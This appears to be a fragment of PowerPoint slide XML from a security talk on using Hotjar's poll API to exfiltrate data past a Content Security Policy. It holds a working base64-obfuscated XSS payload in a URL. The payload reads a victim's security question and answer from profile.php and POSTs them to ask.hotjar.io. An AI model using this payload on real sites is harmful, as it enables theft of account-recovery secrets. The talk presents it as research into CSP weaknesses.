                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"https://ask.hotjar.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/v2/client/sites/2421914/poll/423135/response/85cc0bea-29bb-4963-92e2-00b481a6be98"</a:t>
            </a:r>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method:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"POST"</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headers:</a:t>
            </a:r>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a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Content-Type"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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body:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</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a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</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r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>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console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Success:"</a:t>
            </a:r>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data</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a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>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err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Error:"</a:t>
            </a:r>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error</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>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err</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// There was an error</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>warn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Something went wrong on GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>profile.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>err</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1250" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>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FABCA9EC-71BE-C563-2309-C636C7EEFAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2017059" y="2088776"/>
            <a:ext cx="3881717" cy="26894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72E6BB0-1F96-97C9-29DA-A151E9F52F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977153" y="1344706"/>
            <a:ext cx="4769223" cy="40341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05178D4-50FC-F6D2-2AAE-82417CBC9C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="2429434"/>
            <a:ext cx="9805416" cy="67038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411635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812F08-718D-903E-4721-9FC7989FEB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609597" y="1359508"/>
            <a:ext cx="10972800" cy="3624069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://hotjar.keyfc.xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/secret.php?msg=hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B40000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%22;eval(atob(%22ZmV0Y2goJy9wcm9maWxlLnBocCcpLnRoZW4oZnVuY3Rpb24gKHJlc3BvbnNlKSB7CiAgcmV0dXJuIHJlc3BvbnNlLnRleHQoKTsKfSkudGhlbihmdW5jdGlvbiAoaHRtbCkgewogIC8vIFRoaXMgaXMgdGhlIEhUTUwgZnJvbSBvdXIgcmVzcG9uc2UgYXMgYSB0ZXh0IHN0cmluZwogIGNvbnN0IHBhcnNlciA9IG5ldyBET01QYXJzZXIoKTsKICAgIGNvbnN0IHBkID0gcGFyc2VyLnBhcnNlRnJvbVN0cmluZyhodG1sLCAidGV4dC9odG1sIik7CiAgICBzcT0ocGQuZ2V0RWxlbWVudEJ5SWQoJ3NlY3VyaXR5X3F1ZXN0aW9uJykpLnZhbHVlOwogICAgc2E9KHBkLmdldEVsZW1lbnRCeUlkKCdzZWN1cml0eV9hbnN3ZXInKSkudmFsdWU7CiAgICB2YXIgZGF0YSA9eyJ1dGsiOm51bGwsInJlc3BvbnNlX2NvbnRlbnQiOiJ7XCJ2ZXJzaW9uXCI6NCxcImFuc3dlcnNcIjpbe1wicXVlc3Rpb25VdWlkXCI6XCI3ODk0MjI5MlwiLFwiYW5zd2VyXCI6XCJTb21ldGhpbmcgZWxzZVwiLFwiY29tbWVudFwiOlwiIitzcSsiPzogIitzYSsiXCJ9XX0iLCJxdWVzdGlvbnNfc2VlbiI6WyI3ODk0MjI5Mi1jYmY2LTQ2NjctYjkwMi0yMTA0ZDMyMzRjMzMiXSwiZmlyc3Rfc2VlbiI6dHJ1ZSwiYWN0aW9uIjoiY3JlYXRlX29yX3VwZGF0ZV9wb2xsX3Jlc3BvbnNlIiwid2luZG93X3dpZHRoIjoxODQ4LCJ3aW5kb3dfaGVpZ2h0Ijo0NTIsInVzZXJfaWQiOiJlNjMxYTVhMS0wNGM5LTU4MTAtODgwMy0zNzhiNTQ1NDk4NTYiLCJ1cmwiOiJodHRwczovL2hvdGphci5rZXlmYy54eXovZGVtbzEtaG90amFyLnBocCIsImlkZW50aWZ5X3VzZXJfaWQiOm51bGx9OwoKICBmZXRjaCgiaHR0cHM6Ly9hc2suaG90amFyLmlvL2FwaS92Mi9jbGllbnQvc2l0ZXMvMzQyOTkxNC9wb2xsLzkyMzkzNS9yZXNwb25zZS84NWNjMWJlYS0xOWJiLTQ5NjMtOTJlMi0wMGI0ODFjNmJlOTgiLCB7CiAgICBtZXRob2Q6ICJQT1NUIiwKICAgIGhlYWRlcnM6IHsKICAgICJDb250ZW50LVR5cGUiOiAiYXBwbGljYXRpb24vanNvbiIsCiAgICB9LAogICAgYm9keTogSlNPTi5zdHJpbmdpZnkoZGF0YSksCiAgfSkKICAgIC50aGVuKChyZXNwb25zZSkgPT4gcmVzcG9uc2UuanNvbigpKQogICAgLnRoZW4oKGRhdGEpID0%2bIHsKICAgIGNvbnNvbGUubG9nKCJTdWNjZXNzOiIsIGRhdGEpOwogICAgfSkKICAgIC5jYXRjaCgoZXJyb3IpID0%2bIHsKICAgIGNvbnNvbGUuZXJyb3IoIkVycm9yOiIsIGVycm9yKTsKICAgIH0pOwogICAgICAgICAKfSkuY2F0Y2goZnVuY3Rpb24gKGVycikgewogIC8vIFRoZXJlIHdhcyBhbiBlcnJvcgogIGNvbnNvbGUud2FybignU29tZXRoaW5nIHdlbnQgd3Jvbmcgb24gR0VUIHByb2ZpbGUucGhwLicsIGVycik7Cn0pOwo%3d%22));//</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC0661C2-3148-F096-C4B9-2CE1A1E418DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1924048" y="620844"/>
            <a:ext cx="8343899" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Notice this PoC would require ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsafe-eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ allowed in the script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
